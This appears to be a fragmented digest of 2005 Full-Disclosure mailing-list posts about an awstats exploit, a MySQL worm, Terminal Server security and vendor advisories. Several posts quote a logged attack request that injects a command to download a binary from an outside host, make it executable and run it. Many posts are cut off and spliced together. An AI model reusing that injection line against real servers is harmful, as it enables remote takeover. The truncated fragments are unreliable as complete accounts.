> I don't have the time to investigate the "cgi" and "dc" binaries.
> The "cgi" at least tries to daemonize and opens a TCP listening socket.
> They also try to replace the index page on the vulnerable site.
cgi
1495 1495 0 /dev/tty
149E 149E 0 socket
14AA 0
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
___
Mandrakelinux Security Update Advisory
___
Package name: evolution
Advisory ID:
Various chapters of NC-2600 (Raleigh, Wilmington, Charlotte,
Asheville, etc) are proud to announce the coming of:
"CarolinaCon-2005"
The event will be June 10th-12th in Raleigh, NC.
If interested in attending and/or presenting, please see the
following link for existing and emerging details:
http:
On Thu, 27 Jan 2005 11:51:08 -0500 (EST),
[EMAIL PROTECTED]
> Message: 8
> Date: Thu, 27 Jan 2005 00:18:21 -0500
> From: Mike Bailey <[EMAIL PROTECTED]>
> Subject: [Full-Disclosure] spoolcll.exe - new worm being distributed
> via mysql vulnerability?
> To: full-disclosure@lists.netsys.c
Title: Re: [Full-Disclosure] Terminal Server vulnerabilities
>> But I would point out something much more important : there are many
>> more local exploits than remote (on Windows just like any other OS).
>> Local exploits : about 1-2 a month
>> * POSIX - OS/2 subsystem exploitation
>> * De
> No I would not. I would use an IDS with properly tuned sigs for the terminal
> server and then connect the terminal server via a proxy like VNC running
> something over FreeBSD or Linux. I would never allow a Windows terminal
> server to be directly connected to the net...
Spot the two obviou
I have 2 servers running FC2, with xinetd-2.3.13-2 and proftpd-1.2.10-8.1.fc2.dag. The ftp servers are configured to run through xinetd.
xinetd is configured with "cps = 25 30", which is the default.
If I flood ftp connections, xinetd behaves like expected:
Jan 27 15:25:35 horus xinetd[628]: D
>It's also only possible when you've got NetBIOS/CIFS open to
>the Internet,
Yes I know... That is why I said security thru obscurity
> With this argumentation, you could sell your firewalls.
No I would not. I would use an IDS with properly tuned sigs for the terminal
server and then connect t
On Thu, 27 Jan 2005, Brad Spengler wrote:
> I guess anyone who thinks that taking a hardcoded exploit and running it
> 256 times would always result in a successful exploit is stupid.
It would not always result in a successful exploitation; just as flipping
the coin twice is not a guarantee of ge
> I think the joke is on you in this case. There is a large patch series of
> which you judge the first steps only. Those steps introduce the
> infrastructure and concepts into the kernel, and later patches will tweak
> the exact numbers to values with more entropy. ONCE THEY EXISTING
> INFRASTRUCT
Delian Krustev wrote:
There's an exploit in the wild. Here's what it does:
200.96.166.252 - - [26/Jan/2005:06:32:00 +] "GET
/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00
HTTP/1.1" 200 538 "-" "Mozilla/4
From the article text:
"The bot uses the "MySQL UDF Dynamic Library Exploit". In order to
launch the exploit, the bot first has to authenticate to mysql as 'root'
user. A long list of passwords is included with the bot, and the bot
will brute force the password."
Looks like this is small part ex
my firewall alerted me that a program called spoolcll.exe
the worm created a service called "evmon"
The only information about this worm on google is a discussion at the
following url:
http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
they are beginning to determine that it is being di
Definitely confusing, but I believe it stems from a weak root passwd.
"the bot first has to authenticate to mysql as 'root'
user." then it seems to launch the exploit allowing it access to
create the dynamic libraries containing User Defined Functions.
On Thu, 27 Jan 2005 11:47:57 -0600, Dolan, Pa
On Thu, Jan 27, 2005 at 11:10:43AM -0500, Brad Spengler wrote:
> Just wanted to point out to you guys the INCREDIBLE advances in Linux
> security underway on LKML from security expert Arjan van de Ven:
>
> http://lkml.org/lkml/2005/1/27/62
>
> On the subject of his i386-only mmap randomization p
Dear List,
Watch out for "Spoolcll.exe" or connects to Port 3306.
http://forums.whirlpool.net.au/forum-replies.cfm?t=291921&p=1
http://isc.sans.org/index.php
--
Thierry Zoller
http://www.sniff-em.com/secureit.shtml
___
Full-Disclosure - We believe
On Jan 25, 2005, at 22:57, Rembrandt wrote:
On Tue, 25 Jan 2005 21:51:01 -0700
Mandrake Linux Security Team <[EMAIL PROTECTED]> wrote:
Dear Mandrake Linux Security Team,
Why can't you spam another mailing list?
Or create your own for your PATCHES
It is annoying to get more than one mail from you at mon
Check out today's diary at SANS.
http://isc.sans.org/
On Thu, 27 Jan 2005 00:18:21 -0500, Mike Bailey <[EMAIL PROTECTED]> wrote:
> Aloha,
>
> Earlier tonight, i was sitting here at home doing some normal
> browsing, and work and my firewall alerted me that a program called
> spoolcll.exe was atte
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
NSFOCUS Security Advisory(SA2005-01)
Topic: Buffer Overflow in WinAMP in_cdda.dll CDA Device Name
Release Date: 2005-01-27
CVE CAN ID: CAN-2004-1150
http://www.nsfocus.com/english/homepage/research/0501.htm
Affected systems & software
Hi,
I am looking for a security contact at Vonage (www.vonage.com). I have tried
more than once to call their number, and have stopped waiting after 15 minutes
of being put on hold.
--
Noam Rathaus
CTO
Beyond Security Ltd.
http://www.beyondsecurity.com
http://www.securiteam.com
__
Just wanted to point out to you guys the INCREDIBLE advances in Linux
security underway on LKML from security expert Arjan van de Ven:
http://lkml.org/lkml/2005/1/27/62
On the subject of his i386-only mmap randomization patch:
The randomisation range is 1 megabyte (this is bigger than the stack
See Security, Research and Development
www.see-security.com
--
[-] Product Information
SnugServer - All your Software Servers in 1 Application.
Upload and download files to/from the Internet. Unique
firewall file system where your FTP files can
* [EMAIL PROTECTED] (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +] "GET
> /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Maybe you should contact the Slackware maintainer(s) regarding this.
FD has no control over slackware or any other distributions.
[]s
On Wed, Jan 26, 2005 at 02:57:00PM -0200, Carlos de Oliveira wrote:
> Hi there!
>
> I've seen linux distributions
In addition,
You can install Cygwin (www.cygwin.com) with OpenSSH and tunnel Terminal
Services through OpenSSH (very simple to do with PuTTY). And then use your
router or firewall to block port 3389.
-Eddie B.
On Tue, 25 Jan 2005 14:38:30 -0600, Curt Purdy wrote:
> The problem with terminal s
> There are ways to find out the usernames that are admin they begin with 500_
> ( do a Google search if you want )
>
> Any script kiddy worth his salt will tell u this... So this one is off
> because renaming the admin account will only be security thru obscurity, which is
> not good for the internet.
>I've seen linux distributions sometimes posting here on
>full-disclosure its security updates.
Guys, I always wanted to bring this up: why do we have to send the updates to
this list? Why not make another list just for this, or anyone who wants the
security alerts could get them directly from the o
On Thu, 27 Jan 2005 09:00:39 +0100, "Nicolas RUFF (lists)" said:
> But I would point out something much more important : there are many
> more local exploits than remote (on Windows just like any other OS).
>
> Local exploits : about 1-2 a month
> * POSIX - OS/2 subsystem exploitation
> * Debuggi
>Of course, one of the very first things you should do on a Windows box
>is rename the administrator account, so this kind of blind
>brute-forcing is not possible.
There are ways to find out the usernames that are admin they begin with 500_
( do a Google search if you want )
Any script kiddy
On the home page www.slackware.com read the news:
/*
2004-11-27
Pat made a new entry in the ChangeLog giving us all some fresh news about his
health conditions.
He also stated (Pat's gpg signed message) that the security packages (patches)
from the GUS-BR group (GUS GPG KEY) are trusted.
EDITE
ADVISORE 01 15/01/2005
INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY
http://www.intruders.com.br/
http://www.intruders.org.br/
ADVISORE/0105 - UEBIMIAU < 2.7.2 MULTIPLE
VULNERABILITIES
PRIORITY: HIGH
I - INTRODUCTION:
From http://www.uebimiau.org/
"Ueb
On Thu, Jan 27, 2005 at 04:54:09AM -0500, ntx0f wrote:
> I could be wrong but on my system it's not a suid binary, how's this a
> local root?
Maybe, by using some jedi mind tricks ? ;)
--
* Wojciech Pawlikowski :: :: NIC-HDL WP5161-RIPE *
* http://ducer.w00nf.org :: http://www.knockdownhc.com
I could be wrong but on my system it's not a suid binary, how's this a
local root?
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Hello,
I agree with everyone that TS is prone to MiTM attacks, since there is
no server authentication at all.
Have a look at RDESKTOP sources and you will see a plaintext key
exchange at the beginning of the TS session. I suspect this key is
related to the L$HYDRAENCKEY_xxx LSA secret.